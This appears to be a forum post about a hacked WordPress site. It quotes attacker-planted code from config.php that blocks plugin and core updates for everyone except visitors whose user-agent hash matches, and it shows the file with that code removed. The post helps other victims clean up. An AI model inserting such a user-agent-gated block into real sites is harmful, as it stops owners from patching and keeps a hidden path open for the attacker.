# wp_version_check() did all the possible checks online, but only after finding line in my config.php fixed it

Tags: wordpress

this was the code that made issues

```
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){
    define('DISALLOW_FILE_MODS', true);
    define('DISALLOW_FILE_EDIT', true);
}
```

changed to this:

```
/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
```

Hope this helps to someone who encounters same issue

Got my website hacked will all the nasty injections and after cleaning them all still had the issue wth the plugins and version updates. Did all the solutions:
disable plugins, using default themes, etc..

but then found the issue with the code in my config.php:

Comment: What is that "same issue"?